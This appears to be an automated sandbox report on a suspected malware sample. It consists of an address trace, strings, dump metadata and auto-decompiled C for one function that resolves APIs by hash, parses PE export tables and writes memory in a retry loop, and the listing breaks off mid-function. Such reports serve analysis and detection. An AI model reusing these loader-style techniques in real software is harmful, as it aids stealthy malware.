0x00401c8e
0x00401c93
0x00401c9f
0x00401ca3
0x00401ca6
0x00401cae
0x00401cc4
0x00401ce0
0x00401ce5
0x00401cf1
0x00401cf5
0x00401cf8
0x00401d00
0x00401d16
0x00401d32
0x00401d37
0x00401d43
0x00401d47
0x00401d4a
0x00401d52
0x00401d68
0x00401d84
0x00401d89
0x00401d95
0x00401d99
0x00401d9c
0x00401da4
0x00401dba
0x00401dd6
0x00401ddb
0x00401de7
0x00401deb
0x00401dee
0x00401df6
0x00401e0c
0x00401e28
0x00401e2d
0x00401e39
0x00401e3d
0x00401e40
0x00401e48
0x00401e5e
0x00401e7a
0x00401e7f
0x00401e8b
0x00401e8f
0x00401e92
0x00401e9a
0x00401eb0
0x00401ec1
0x00401ecc
0x00401ed1
0x00401ee2
0x00401ee5
0x00401ef3
0x00401ef8
0x00401efd
0x00401f0f
0x00401f14
0x00401f19
0x00401f2b
0x00401f30
0x00401f35
0x00401f47
0x00401f4c
0x00401f51
0x00401f63
0x00401f68
0x00401f6d
0x00401f7f
0x00401f84
0x00401f89
0x00401f9b
0x00401fa0
0x00401fa5
0x00401fba
0x00401fbf
0x00401fc4
0x00401fd9
0x00401fde
0x00401fe3
0x00401ff8
0x00401ffd
0x00402002
0x00402017
0x0040201c
0x00402021
0x00402036
0x0040203b
0x00402040
0x00402055
0x0040205a
0x0040205f
0x00402074
0x00402079
0x0040207e
0x00402093
0x00402098
0x0040209d
0x004020b2
0x004020b7
0x004020bc
0x004020ce
0x004020d3
0x004020d8
0x004020df
0x004020ea
0x004020ef
0x004020f4
0x004020f8
0x004020f9
0x00402104
0x0040210c
0x00402110
0x00402114
0x00402115
0x00402119
0x0040211d
0x00402121
0x00402125
0x0040212b
0x00402133
0x00402137
0x00402137
0x0040213d
0x00402142
0x00402146
0x0040214e
0x00402157
0x0040215d
0x00402166
0x0040216c
0x00402172
0x00402178
0x00402180
0x00402186
0x0040218c
0x00402197
0x004021ab
0x004021b4
0x004021bd
0x004021c6
0x004021c8
0x004021d1
0x004021d5
0x004021de
0x00000000
0x004021e4
0x004021e4
0x004021f0
0x00402203
0x00402215
0x00402220
0x00402227
0x0040222d
0x00402231
0x00402236
0x0040223e
0x00402242
0x0040224b
0x00402253
0x00402259
0x0040225d
0x00402261
0x0040226b
0x0040226c
0x00402272
0x00402276
0x00402277
0x0040227b
0x00402281
0x00402285
0x00402289
0x0040228f
0x00402295
0x0040229a
0x0040229c
0x004027c5
0x004027cc
0x004027d1
0x004022a2
0x004022a9
0x004022ab
0x00000000
0x004022b1
0x004022bb
0x004022c0
0x004022d1
0x004022e0
0x004022fc
0x0040230a
0x00402311
0x0040231d
0x00402329
0x0040232e
0x0040232e
0x0040232e
0x004022ab
0x00402334
0x0040233a
0x004027ad
0x004027b1
0x004027b5
0x004027bc
0x00000000
0x00000000
0x00000000
0x0040233a
0x00402356
0x00402364
0x00402370
0x00402375
0x00402384
0x00402388
0x0040239e
0x004023ba
0x004023bf
0x004023cb
0x004023cf
0x004023d2
0x004023da
0x004023f0
0x0040240c
0x00402411
0x0040241d
0x00402421
0x00402424
0x0040242c
0x00402442
0x0040245e
0x00402463
0x0040246f
0x00402473
0x00402476
0x0040247e
0x00402494
0x004024a5
0x004024b0
0x004024b7
0x004024c3
0x004024c4
0x004024c8
0x004024c9
0x004024d5
0x004024e3
0x004024e8
0x004024ed
0x004024ff
0x00402504
0x00402509
0x0040251b
0x00402520
0x00402525
0x00402537
0x0040253c
0x00402548
0x0040254d
0x00402559
0x00402565
0x00402566
0x00402571
0x00402575
0x00402576
0x0040257a
0x0040257e
0x00402587
0x0040258b
0x0040258f
0x004025ac
0x004025c0
0x004025c7
0x00000000
0x00402340
0x00402340
0x00402340
0x00402348
0x00402348
0x0040234a
0x0040234e
0x00402352
0x00000000
0x00402352
0x004025cc
0x004025cc
0x004025d0
0x004025d2
0x004025d4
0x004025d9
0x004025db
0x004025de
0x004025ec
0x004025f1
0x004025f4
0x004025f6
0x004025f8
0x004025f8
0x004025fb
0x00402603
0x00402650
0x00402650
0x00402658
0x004026a5
0x004026ac
0x004026b8
0x004026c4
0x004026d0
0x004026dc
0x004026ef
0x0040265a
0x00402669
0x0040266b
0x0040266d
0x0040266f
0x0040266f
0x00402687
0x00402687
0x00402693
0x00402698
0x0040269a
0x00000000
0x0040269c
0x0040269c
0x004026a3
0x004026a4
0x004026a4
0x0040269a
0x00402605
0x00402614
0x00402616
0x00402618
0x0040261a
0x0040261a
0x00402632
0x00402632
0x0040263e
0x00402643
0x00402645
0x00000000
0x00402647
0x00402647
0x0040264e
0x0040264f
0x0040264f
0x00402645
0x004017dc
0x004017de
0x004017f4
0x004017f6
0x004017f8
0x00000000
0x004017fa
0x004017fa
0x00401802
0x0040180b
0x0040180b
0x00401810
0x00401818
0x00000000
0x0040181e
0x00401828
0x0040182d
0x0040182f
0x00401852
0x00401857
0x00401859
0x00000000
0x0040185f
0x0040185f
0x00401863
0x00401864
0x00401864
0x00401831
0x00401831
0x00401837
0x00401839
0x0040183a
0x0040183b
0x0040183c
0x0040183e
0x00401845
0x00401846
0x00401847
0x00401847
0x0040182f
0x00401818
0x004017f8
0x00401784
0x00401786
0x0040179c
0x0040179e
0x004017a0
0x00000000
0x004017a2
0x004017a2
0x004017aa
0x00000000
0x00000000
0x004017b0
0x00000000
0x004017aa
0x004017a0
0x00401759
0x00401759
0x00401760
0x00401762
0x00401763
0x00401763
0x00401757
0x004016d4
0x004016d4
0x004016dc
0x0040274f
0x00402756
0x00000000
0x004016e2
0x0040275b
0x00402762
0x0040276e
0x0040277a
0x00402786
0x00402792
0x00402797
0x004027a5
0x004027a5
0x0040168a
0x0040168a
0x00401693
0x00401694
0x00401699
0x0040169b
0x0040169c
0x0040169d
0x004016a9
0x004016aa
0x004016ab
0x004016ab
0x004015ca
0x004015d1
0x004015e7
0x004015e7

Strings

)8GV, xrefs: 00401956
)8GV, xrefs: 004027FD

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: )8GV$)8GV
API String ID: 0-993736920
Opcode ID: ef6704b0abf684c3b15d6157c47d75ff0ed4d58ec215d25b01b9361924ac4d3f
Instruction ID: 3117ad401afd03fd0f6f56f40b8a0e905a3b47a60b0f5937b5f3988691b2ef0b
Opcode Fuzzy Hash: ef6704b0abf684c3b15d6157c47d75ff0ed4d58ec215d25b01b9361924ac4d3f
Instruction Fuzzy Hash: 04A29071A187909AE330EF25DD52BEFB3E4AFE2318F404A1EB18952193EF349944C756

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 2.9, Strings: 1, Instructions: 1641
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E0040ACD0(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v28;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				char _v120;
				signed int _v124;
				char _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				char _v148;
				char _v156;
				char _v160;
				char _v164;
				signed int _v168;
				char _v172;
				char _v176;
				char _v180;
				signed int _v192;
				char _v196;
				char _v200;
				char _v216;
				char _v220;
				char _v232;
				char _v248;
				void* _v252;
				char _v256;
				char _v260;
				char _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				void* _v276;
				char _v280;
				signed int _v284;
				char _v288;
				char _v292;
				intOrPtr _v296;
				signed int _v300;
				signed int _v304;
				char _v308;
				char _v312;
				char _v316;
				signed int _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				void* _v364;
				char _v368;
				void* _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				void* _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				void* _v440;
				char _v444;
				void* _v448;
				char _v452;
				char _v460;
				intOrPtr _v464;
				void* _v468;
				void* _v472;
				void* _v476;
				char _v480;
				void* _v484;
				void* _v488;
				intOrPtr _v492;
				void* _v496;
				void* _v500;
				void* _v504;
				intOrPtr _v508;
				void* _v520;
				void* _v524;
				void* _v528;
				void* _v532;
				char _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				void* _v548;
				intOrPtr _v552;
				void* _v556;
				char _v560;
				signed short* _v564;
				signed int _v568;
				signed int _v572;
				char _v576;
				intOrPtr _v580;
				signed int _v584;
				void* _v588;
				void* _v592;
				void* _v596;
				char _v604;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				signed int _v628;
				char _v636;
				intOrPtr _v640;
				char _v644;
				void* _v648;
				signed int _v656;
				char _v660;
				char _v668;
				char _v676;
				signed int _v680;
				intOrPtr _v700;
				void* _v704;
				void* _v708;
				void* _v716;
				intOrPtr _v724;
				intOrPtr _v732;
				signed int _v736;
				signed int _v740;
				intOrPtr _v744;
				void* _v748;
				void* _v756;
				void* _v764;
				void* _v772;
				void* _v776;
				void* _v780;
				void* _v784;
				void* _v788;
				void* _v796;
				void* _v800;
				void* _v804;
				void* _v808;
				void* _v812;
				void* _v816;
				void* _v820;
				void* _v824;
				void* _v828;
				void* _v836;
				void* _v840;
				void* _v844;
				void* _v848;
				void* _v852;
				void* _v856;
				void* _v860;
				void* _v868;
				void* _v872;
				void* _v876;
				void* _v880;
				void* _v888;
				void* _v892;
				void* _v908;
				void* _v940;
				void* _v944;
				void* _v948;
				void* _v952;
				void* _v956;
				void* _v960;
				void* _v964;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t632;
				void* _t667;
				signed int _t672;
				char _t747;
				signed int _t768;
				signed int _t770;
				signed int _t778;
				char* _t781;
				signed int _t782;
				signed int _t793;
				signed int _t795;
				char* _t798;
				signed int _t799;
				signed int _t810;
				signed int _t812;
				signed int _t813;
				signed int _t815;
				intOrPtr _t865;
				intOrPtr _t900;
				signed int _t911;
				char _t974;
				signed char* _t1005;
				signed int _t1006;
				void* _t1008;
				void* _t1011;
				intOrPtr _t1017;
				signed int _t1021;
				char _t1030;
				char _t1035;
				signed int _t1036;
				char* _t1038;
				signed int _t1040;
				signed int _t1041;
				signed int* _t1043;
				signed int _t1044;
				void* _t1045;
				void* _t1047;
				void* _t1055;
				void* _t1065;
				char* _t1154;
				signed int _t1326;
				signed short* _t1435;
				void* _t1438;
				char* _t1449;
				char* _t1452;
				signed int _t1455;
				signed int _t1457;
				signed int _t1459;
				signed int _t1460;
				signed int _t1465;
				signed int _t1466;
				signed int _t1467;
				signed int _t1481;
				void* _t1485;
				signed int _t1487;
				char _t1498;
				void* _t1499;
				void* _t1500;
				char _t1503;
				void* _t1514;
				void* _t1518;
				char _t1531;
				signed int _t1537;
				signed int _t1538;
				signed int _t1539;
				char _t1540;
				intOrPtr _t1542;
				signed int _t1543;
				signed int _t1545;
				void* _t1547;
				void* _t1567;
				void* _t1569;
				signed int _t1570;
				void* _t1572;
				void* _t1573;
				void* _t1574;
				void* _t1576;

				_t1572 = (_t1570 & 0xfffffff0) - 0x254;
				_v540 = __edx;
				_v28 = __ecx;
				_t1534 =  *((intOrPtr*)(__ecx + 0xc));
				E004115C0(0x57325ee3, 0xb7186560);
				_push(0);
				E00429350( &_v192);
				_v180 = 0;
				_push(0);
				E00429350( &_v176);
				_push(0);
				E00429350( &_v76);
				_v536 = 0x58d59bc9;
				asm("pxor xmm0, xmm0");
				asm("movq [esp+0x68], xmm0");
				E00429670( &_v80, E00429650( &_v80) + 0x10);
				E00429640( &_v84, E00429650( &_v84) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v544 = 0x3b4caff7;
				asm("movq [esp+0x68], xmm1");
				E00429670( &_v88, E00429650( &_v88) + 0x10);
				E00429640( &_v92, E00429650( &_v92) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v552 = 0xd9ff67e3;
				asm("movq [esp+0x68], xmm1");
				E00429670( &_v96, E00429650( &_v96) + 0x10);
				E00429640( &_v100, E00429650( &_v100) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v560 = 0xbcd9ca71;
				asm("movq [esp+0x68], xmm1");
				E00429670( &_v104, E00429650( &_v104) + 0x10);
				E00429640( &_v108, E00429650( &_v108) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v568 = 0x1be15feb;
				asm("movq [esp+0x68], xmm1");
				E00429670( &_v112, E00429650( &_v112) + 0x10);
				E00429640( &_v116, E00429650( &_v116) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v576 = 0xebe915fa;
				asm("movq [esp+0x68], xmm1");
				E00429670( &_v120, E00429650( &_v120) + 0x10);
				E00429640( &_v124, E00429650( &_v124) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("movups [eax], xmm0");
				E00431270(0x588ab3ea,  &_v128);
				E00429640( &_v128, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1d8], xmm0");
				E00429640( &_v132, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1e0], xmm0");
				E00429640( &_v136, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1f0], xmm0");
				E00429640( &_v140, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1f8], xmm0");
				E00429640( &_v144, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x200], xmm0");
				E00429640( &_v148, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [eax-0x38], xmm0");
				 *((intOrPtr*)( &_v128 - 0x98)) = _t1534;
				E0040D570( &_v280,  &_v136,  &_v128);
				_t1487 = _v140;
				_t1027 = _v136;
				if((_t1487 | _v136) != 0) {
					_push(0x40);
					E00429350( &_v288);
					E00430FA0(_t1534, E00429640( &_v292, 0), __eflags, _t1487, _t1027, 0x40, 0);
					_t1435 = E00429640( &_v312, 0);
					__eflags = ( *_t1435 & 0x0000ffff) - 0x5a4d;
					if(( *_t1435 & 0x0000ffff) == 0x5a4d) {
						asm("cdq");
						_v560 = _t1435[0x1e] + _t1487;
						asm("adc edx, ebx");
						_v564 = _t1435;
						_push(0x108);
						E00429350( &_v388);
						E00430FA0(_t1534, E00429640( &_v392, 0), __eflags, _v568, _v572, 0x108, 0);
						_push( &_v412);
						E00429520( &_v316);
						E00429510( &_v416);
						_t632 = E00429640( &_v320, 0);
						__eflags =  *_t632 - 0x4550;
						if( *_t632 != 0x4550) {
							goto L3;
						} else {
							_t1481 =  *(_t632 + 0x88);
							_v568 = _t1481;
							_v572 =  *((intOrPtr*)(_t632 + 0x8c));
							__eflags = _t1481;
							if(_t1481 == 0) {
								goto L3;
							} else {
								__eflags = _v572;
								if(_v572 == 0) {
									goto L3;
								} else {
									_push(_v572);
									E00429350( &_v396);
									_t1011 = E00429640( &_v400, 0);
									asm("adc ebx, 0x0");
									E00430FA0(_t1534, _t1011, __eflags, _t1487 + _v576, _t1027, _v580, 0);
									_push( &_v420);
									E00429520( &_v324);
									E00429510( &_v424);
									_t1065 = E00429640( &_v328, 0);
									_t1017 =  *((intOrPtr*)(_t1572 + 0x44));
									 *((intOrPtr*)(_t1065 + 0x1c)) =  *((intOrPtr*)(_t1065 + 0x1c)) - _t1017;
									 *((intOrPtr*)(_t1065 + 0x24)) =  *((intOrPtr*)(_t1065 + 0x24)) - _t1017;
									 *((intOrPtr*)(_t1065 + 0x20)) =  *((intOrPtr*)(_t1065 + 0x20)) - _t1017;
									_t1485 = E00429640( &_v332,  *((intOrPtr*)(_t1065 + 0x20)) - _t1017);
									__eflags =  *(_t1065 + 0x18);
									if( *(_t1065 + 0x18) > 0) {
										_v560 = _t1534;
										_t1021 = 0;
										__eflags = 0;
										_t1531 = _v576;
										while(1) {
											_t1021 = _t1021 + 1;
											 *((intOrPtr*)(_t1485 + _t1021 * 8 - 8)) =  *((intOrPtr*)(_t1485 + _t1021 * 8 - 8)) - _t1531;
											_t554 = _t1021 - 1; // 0x0
											_t1567 = _t1021 + _t1021;
											__eflags = _t1021 + _t554 -  *(_t1065 + 0x18);
											if(_t1021 + _t554 >=  *(_t1065 + 0x18)) {
												break;
											}
											 *((intOrPtr*)(_t1485 + _t1021 * 8 - 4)) =  *((intOrPtr*)(_t1485 + _t1021 * 8 - 4)) - _t1531;
											__eflags = _t1567 -  *(_t1065 + 0x18);
											if(_t1567 <  *(_t1065 + 0x18)) {
												continue;
											}
											break;
										}
										_t1534 = _v560;
									}
									_push( &_v308);
									E004293D0( &_v292);
								}
							}
						}
					} else {
						L3:
						_push(0);
						E00429350( &_v284);
					}
					E00429510( &_v304);
					E0042A110( &_v88);
					_v544 = 0x41195991;
					asm("pxor xmm0, xmm0");
					asm("movq [esp+0x68], xmm0");
					E00429670( &_v88, E00429650( &_v88) + 0x10);
					E00429640( &_v92, E00429650( &_v92) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					_v552 = 0x77be1f6;
					asm("movq [esp+0x68], xmm1");
					E00429670( &_v96, E00429650( &_v96) + 0x10);
					E00429640( &_v100, E00429650( &_v100) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					_v560 = 0xb5cdecc0;
					asm("movq [esp+0x68], xmm1");
					E00429670( &_v104, E00429650( &_v104) + 0x10);
					E00429640( &_v108, E00429650( &_v108) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					_t1573 = _t1572 + 0xfffffff4;
					asm("movups [eax], xmm0");
					asm("movq xmm1, [edx+0xd8]");
					asm("movq [esp], xmm1");
					_v668 =  &_v112;
					E0040E780( &_v312, _t1534, __eflags);
					E00429640( &_v124, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x1e8], xmm0");
					E00429640( &_v128, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x210], xmm0");
					_t1438 = E00429640( &_v132, 0x20);
					_v268 =  *((intOrPtr*)(_t1438 + 8));
					 *((intOrPtr*)(_t1573 + 0x218)) =  *((intOrPtr*)(_t1438 + 0xc));
					_push(0);
					E00429350( &_v320);
					_push(0);
					E00429350( &_v308);
					_push(0);
					_push( *0x439d74);
					E00411BA0(__eflags,  &_v284);
					E00429B10( &_v340);
					E00420B10( &_v284);
					E00429670( &_v328, E00429A90( &_v344, _t1534));
					_t667 = E00429640( &_v348, 0);
					E0040AC20(_t1569, _t667, E00429640( &_v336, 0), _v296);
					_t1574 = _t1573 + 8;
					_t1030 = E00429650( &_v340);
					_t95 = _t1030 + 2; // 0x2
					_v180 = E0040D860( &_v300, 0x20000000, __eflags, _t95);
					_v640 = 0x20000000;
					_t672 = E0040DB60( &_v304, 0x80000000, __eflags, 0x82);
					_v192 = _t672;
					 *(_t1574 + 0x220) = 0x80000000;
					__eflags = _t672 |  *(_t1574 + 0x220);
					if((_t672 |  *(_t1574 + 0x220)) == 0) {
						L6:
						E00429510( &_v288);
						E00429510( &_v304);
						E00429510( &_v320);
						E00429510( &_v120);
						E0040E2F0(_t1030, _t1574 + 0x1bc, _t1569);
						E00429510(_t1574 + 0x1ac);
						__eflags = 0;
						return 0;
					} else {
						__eflags = _v124 | _v584;
						if((_v124 | _v584) != 0) {
							E00410B70( &_v560, 0, 0x80);
							_t1576 = _t1574 + 0xc;
							_v464 = _a4;
							_push(0);
							_push(0);
							E00432060(_t1030,  &_v400, 0, _t1534);
							_v348 =  *((intOrPtr*)(_t1576 + 0x48));
							_t1449 =  &_v408;
							 *((intOrPtr*)(_t1449 + 0x38)) = _a8;
							_push(_t1449);
							E0040E090( &_v384, _t1534,  &_v352);
							asm("cdq");
							asm("movd xmm1, eax");
							asm("movd xmm0, edx");
							asm("punpckldq xmm1, xmm0");
							asm("movq [esp+0xb0], xmm1");
							_v508 = E00429650(_a8);
							asm("cdq");
							asm("movd xmm1, eax");
							asm("movd xmm0, edx");
							asm("punpckldq xmm1, xmm0");
							asm("movq [esp+0xc0], xmm1");
							_v492 = E00429650(_v620);
							asm("cdq");
							asm("movd xmm1, eax");
							asm("movd xmm0, edx");
							asm("punpckldq xmm1, xmm0");
							asm("movq [edi-0xb8], xmm1");
							E00430FA0(_t1534,  &_v460, __eflags, _v272, _v156, 7,  &_v292);
							_t1154 =  &_v156;
							 *((intOrPtr*)(_t1154 - 0x148)) = _v288;
							 *((intOrPtr*)(_t1154 - 0x144)) =  *((intOrPtr*)(_t1154 - 0x10));
							E0042A110(_t1154);
							_v612 = 0x9cac62c7;
							asm("pxor xmm0, xmm0");
							asm("movq [esp+0x68], xmm0");
							E00429670( &_v156, E00429650( &_v156) + 0x10);
							E00429640( &_v160, E00429650( &_v160) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v620 = 0xa8f2638d;
							asm("movq [esp+0x68], xmm1");
							E00429670( &_v164, E00429650( &_v164) + 0x10);
							E00429640( &_v168, E00429650( &_v168) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v628 = 0xd8cc7390;
							asm("movq [esp+0x68], xmm1");
							E00429670( &_v172, E00429650( &_v172) + 0x10);
							E00429640( &_v176, E00429650( &_v176) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v636 = 0x6a68465a;
							asm("movq [esp+0x68], xmm1");
							E00429670( &_v180, E00429650( &_v180) + 0x10);
							E00429640(_t1576 + 0x22c, E00429650(_t1576 + 0x228) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v644 = 0x58d59bc9;
							asm("movq [esp+0x68], xmm1");
							E00429670(_t1576 + 0x22c, E00429650(_t1576 + 0x228) + 0x10);
							E00429640( &_v192, E00429650( &_v192) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							 *((intOrPtr*)(_t1576 + 0x60)) = 0xe9fbf3a8;
							asm("movq [esp+0x68], xmm1");
							E00429670( &_v196, E00429650( &_v196) + 0x10);
							E00429640( &_v200, E00429650( &_v200) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v660 = 0x649746ec;
							asm("movq [esp+0x68], xmm1");
							E00429670(_t1576 + 0x22c, E00429650(_t1576 + 0x228) + 0x10);
							E00429640(_t1576 + 0x22c, E00429650(_t1576 + 0x228) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v668 = 0x35b39b2b;
							asm("movq [esp+0x68], xmm1");
							E00429670(_t1576 + 0x22c, E00429650(_t1576 + 0x228) + 0x10);
							E00429640( &_v216, E00429650( &_v216) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							_t1452 =  &_v220;
							asm("movups [eax], xmm0");
							E00431270(0x588ab3ea, _t1452);
							E00429640( &_v220, 0);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x70], xmm0");
							E00429640(_t1576 + 0x22c, 0x10);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x78], xmm0");
							E00429640(_t1576 + 0x22c, 0x20);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x80], xmm0");
							E00429640( &_v232, 0x30);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x88], xmm0");
							E00429640(_t1576 + 0x22c, 0x40);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x90], xmm0");
							E00429640(_t1576 + 0x22c, 0x50);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x98], xmm0");
							E00429640(_t1576 + 0x22c, 0x60);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0xa0], xmm0");
							E00429640( &_v248, 0x70);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [ecx-0x100], xmm0");
							_t747 = E0040D530( &_v380, _t1452);
							_v396 = _t747;
							_v400 = _t1452;
							_t1496 = _t1452 - 0xffffffff;
							__eflags = _t747 - 0xffffffff | _t1452 - 0xffffffff;
							if((_t747 - 0xffffffff | _t1452 - 0xffffffff) == 0) {
								E0040E230( &_v388);
								E00432530(_t1030,  &_v412, 0xffffffff, _t1496, _t1534);
								E00429510( &_v300);
								E00429510( &_v316);
								E00429510( &_v332);
								E00429510( &_v132);
								E0040E2F0(_t1030, _t1576 + 0x1bc, _t1569);
								E00429510( &_v256);
								__eflags = 0;
								return 0;
							} else {
								_t1455 = _v108 | _v104;
								__eflags = _t1455;
								if(_t1455 == 0) {
									_v604 = _t1030;
									_t1498 = 0;
									__eflags = 0;
									 *((intOrPtr*)(_t1576 + 0x54)) = _t1534;
									do {
										_push(0);
										E00429350( &_v428);
										E004116B0(_t1498, _t1534,  &_v376, 0x57325ee3);
										E0041FDB0( &_v384,  &_v376);
										_t1456 = 0x7fffffff;
										E00429710( &_v444, _v380, E00426040(_v380, 0x7fffffff));
										E00420B10( &_v388);
										E00418CA0( &_v396);
										_t1537 = _v168;
										_t1034 =  *((intOrPtr*)( &_v452 + 0x120));
										_t768 = E00429650( &_v452);
										__eflags = _t768;
										if(_t768 <= 0) {
											L25:
											asm("movq xmm0, [esp+0x200]");
											asm("movq [esp], xmm0");
											asm("pxor xmm2, xmm2");
											_v680 = 5;
											_v676 = _v280;
											asm("movq xmm1, [esp+0x210]");
											 *(_t1576 + 0x10) = _v284;
											asm("movq [esp+0x14], xmm1");
											_t1034 = _v148;
											_v660 = _v148;
											_t1534 = _v144;
											_v656 = _v144;
											asm("movq [esp+0x24], xmm2");
											asm("movq [esp+0x2c], xmm2");
											_t770 = E004304B0(_t1498, _v144);
											__eflags = _t770;
											if(_t770 == 0) {
												E004122A0(0x3e8, _t1456);
												E00429510( &_v432);
												_t1455 =  &_v120;
												E0040D570( &_v264, _t1455,  &_v112);
												__eflags = _v116 | _v112;
												if((_v116 | _v112) != 0) {
													_t1030 =  *((intOrPtr*)(_t1576 + 0x50));
													_t1534 = _v604;
													goto L9;
												} else {
													_t974 = E0040D530( &_v264, _t1455);
													_v280 = _t974;
													_v284 = _t1455;
													_t1479 = _t1455 - 0xffffffff;
													__eflags = _t974 - 0xffffffff | _t1455 - 0xffffffff;
													if((_t974 - 0xffffffff | _t1455 - 0xffffffff) == 0) {
														E0040E230( &_v392);
														E00432530(_t1034,  &_v416, _t1479, _t1498, _t1534);
														E00429510( &_v304);
														E00429510( &_v320);
														E00429510( &_v336);
														E00429510( &_v136);
														E0040E2F0(_t1034, _t1576 + 0x1bc, _t1569);
														E00429510( &_v260);
														__eflags = 0;
														return 0;
													} else {
														goto L29;
													}
												}
											} else {
												goto L26;
											}
										} else {
											__eflags = 0;
											_v624 = _t1498;
											_t1498 = _t1537;
											_t1534 = 0;
											while(1) {
												_t1005 = E00429640( &_v432, _t1534);
												asm("movq xmm0, [esp+0x200]");
												asm("movq [esp], xmm0");
												 *((intOrPtr*)(_t1576 + 8)) = 5;
												_v680 = _v284;
												asm("movq xmm1, [esp+0x1f8]");
												_v676 = _v288;
												_t1456 =  *_t1005 & 0x000000ff;
												asm("movq [esp+0x14], xmm1");
												asm("movq xmm2, [0x439d40]");
												 *((intOrPtr*)(_t1576 + 0x1c)) = _t1498;
												_v660 = _t1034;
												_v656 =  *_t1005 & 0x000000ff;
												 *((intOrPtr*)(_t1576 + 0x28)) = 0;
												asm("movq [esp+0x2c], xmm2");
												_t1006 = E004304B0(_t1498, _t1534);
												__eflags = _t1006;
												if(_t1006 != 0) {
													break;
												}
												E004122A0(0x64, _t1456);
												_t1498 = _t1498 + 1;
												asm("adc ebx, 0x0");
												_t1534 = _t1534 + 1;
												_t1008 = E00429650( &_v432);
												__eflags = _t1534 - _t1008;
												if(_t1534 < _t1008) {
													continue;
												} else {
													_t1498 = _v624;
													goto L25;
												}
												goto L95;
											}
											L26:
											E00429510( &_v432);
											E0040E230( &_v392);
											E00432530(_t1034,  &_v416, _t1456, _t1498, _t1534);
											E00429510( &_v304);
											E00429510( &_v320);
											E00429510( &_v336);
											E00429510( &_v136);
											E0040E2F0(_t1034, _t1576 + 0x1bc, _t1569);
											E00429510( &_v260);
											__eflags = 0;
											return 0;
										}
										goto L95;
										L29:
										_t1498 = _t1498 + 1;
										__eflags = _t1498 - 0xa;
									} while (_t1498 != 0xa);
									E0040E230( &_v392);
									E00432530(_t1034,  &_v416, _t1479, _t1498, _t1534);
									E00429510( &_v304);
									E00429510( &_v320);
									E00429510( &_v336);
									E00429510( &_v136);
									E0040E2F0(_t1034, _t1576 + 0x1bc, _t1569);
									E00429510( &_v260);
									__eflags = 0;
									return 0;
								} else {
									L9:
									 *((intOrPtr*)(_t1576 + 0x50)) = _t1030;
									_t1499 = 0;
									__eflags = 0;
									_v604 = _t1534;
